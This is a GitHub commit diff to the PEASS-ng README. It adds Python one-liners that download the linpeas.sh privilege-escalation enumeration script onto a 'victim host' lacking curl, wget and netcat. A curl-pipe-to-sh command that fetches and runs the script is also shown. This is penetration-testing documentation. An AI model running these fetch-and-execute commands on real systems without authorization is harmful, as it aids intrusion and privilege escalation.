useful for when on the victim host we have access to the internet but we do not have: curl, wget or netcat

This commit is contained in:
d4t4s3c 2024-01-13 13:40:24 +01:00 committed by GitHub
parent 31aed5cd92
commit 28a8f4b3e9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -18,6 +18,11 @@ Find the **latest versions of all the scripts and binaries in [the releases page
```bash ```bash
# From github # From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Without curl
python -c "import urllib.request; urllib.request.urlretrieve('https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"
python3 -c "import urllib.request; urllib.request.urlretrieve('https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"
``` ```
```bash ```bash